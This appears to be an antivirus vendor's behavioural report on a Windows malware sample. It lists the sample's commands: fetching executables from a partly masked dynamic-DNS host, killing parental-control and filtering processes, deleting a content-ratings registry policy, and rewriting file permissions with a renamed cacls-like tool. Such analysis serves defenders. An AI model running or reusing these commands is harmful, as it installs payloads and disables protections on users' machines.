Technical Information
Malicious functions:
Creates and executes the following:
- '<SYSTEM32>\readcac.exe' "wudriver.exe" /C /T /D администраторы SYSTEM Пользователи Все /Y
- '<SYSTEM32>\readcac.exe' "wudriver.exe" /C /T /D %USERNAME%s SYSTEM Users evryone /Y
- '<SYSTEM32>\readcac.exe' "wups.exe" /C /T /D администраторы SYSTEM Пользователи Все /Y
- '<SYSTEM32>\readcac.exe' "wups.exe" /C /T /D %USERNAME%s SYSTEM Users evryone /Y
- '<SYSTEM32>\readcac.exe' "ipfw.exe" /C /T /D администраторы SYSTEM Пользователи Все /Y
- '<SYSTEM32>\readcac.exe' "SafeSurf ABUSE README.txt" /C /T /D администраторы SYSTEM Пользователи Все /Y
- '<SYSTEM32>\readcac.exe' "SafeSurf ABUSE README.txt" /C /T /D %USERNAME%s SYSTEM Users evryone /Y
- '<SYSTEM32>\readcac.exe' "ipfw.exe" /C /T /D %USERNAME%s SYSTEM Users evryone /Y
- '<SYSTEM32>\readcac.exe' "stmaster.exe" /C /T /D администраторы SYSTEM Пользователи Все /Y
- '%WINDIR%\ehome\wmild.exe' -c http://ka####rf.zapto.org/prochack.exe
- '<SYSTEM32>\readcac.exe' "wuauсlt.exe" /C /T /D администраторы SYSTEM Пользователи Все /Y
- '%WINDIR%\ehome\wmild.exe' -c http://ka####rf.zapto.org/SURFSET.exe
- '%WINDIR%\ehome\wmild.exe' -c http://ka####rf.zapto.org/zanyserv.exe
- '<SYSTEM32>\readcac.exe' "wuauсlt.exe" /C /T /D %USERNAME%s SYSTEM Users evryone /Y
- '<SYSTEM32>\readcac.exe' "waagent.exe" /C /T /D администраторы SYSTEM Пользователи Все /Y
- '<SYSTEM32>\readcac.exe' "waagent.exe" /C /T /D %USERNAME%s SYSTEM Users evryone /Y
- '<SYSTEM32>\readcac.exe' "wuapp.exe" /C /T /D администраторы SYSTEM Пользователи Все /Y
- '<SYSTEM32>\readcac.exe' "wuapp.exe" /C /T /D %USERNAME%s SYSTEM Users evryone /Y
Executes the following:
- '<SYSTEM32>\taskkill.exe' /f /im waagent.exe /T
- '<SYSTEM32>\taskkill.exe' /f /im wuapp.exe /T
- '<SYSTEM32>\taskkill.exe' /f /im wuauсlt.exe /T
- '<SYSTEM32>\taskkill.exe' /f /im wups.exe /T
- '<SYSTEM32>\taskkill.exe' /f /im stmaster.exe /T
- '<SYSTEM32>\taskkill.exe' /f /im ipfw.exe /T
- '<SYSTEM32>\taskkill.exe' /f /im wudriver.exe /T
- '<SYSTEM32>\chcp.com' 1251
- '<SYSTEM32>\taskkill.exe' /f /im ipz2.exe
- '<SYSTEM32>\taskkill.exe' /f /im ipz.exe
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\ehome\SER.bat" "
- '<SYSTEM32>\taskkill.exe' /f /im nvidsrv.exe
- '<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f
- '<SYSTEM32>\taskkill.exe' /f /im surfguard.exe
- '<SYSTEM32>\taskkill.exe' /f /im safesurf.exe
Modifies file system :
Creates the following files:
- %WINDIR%\ehome\SURFSET.exe
- %WINDIR%\ehome\zanyserv.exe
- %WINDIR%\ehome\amsql.exe
- %WINDIR%\ehome\sDPS.bat
- %WINDIR%\ehome\prochack.exe
- <SYSTEM32>\ipfw.exe
- <SYSTEM32>\stmaster.exe
- %WINDIR%\ehome\SETUPER.bat
- <SYSTEM32>\wuauсlt.exe
- %WINDIR%\ehome\DPS.bat
- %WINDIR%\ehome\cmsdll.exe
- %WINDIR%\ehome\instsrv.exe
- %WINDIR%\ehome\DNS.bat
- %WINDIR%\ehome\SER.bat
- %WINDIR%\ehome\sc.exe
- %WINDIR%\ehome\wmild.exe
- %WINDIR%\ehome\readcac.exe
- %WINDIR%\ehome\ser.reg
- %WINDIR%\ehome\SETA.bat
Moves the following files:
- from %WINDIR%\ehome\readcac.exe to <SYSTEM32>\readcac.exe
Network activity:
Connects to:
- 'ka####rf.zapto.org':80
TCP:
HTTP GET requests:
- ka####rf.zapto.org/prochack.exe
- ka####rf.zapto.org/zanyserv.exe
- ka####rf.zapto.org/SURFSET.exe
UDP:
- DNS ASK ka####rf.zapto.org
Miscellaneous:
Searches for the following windows:
- ClassName: '(null)' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'
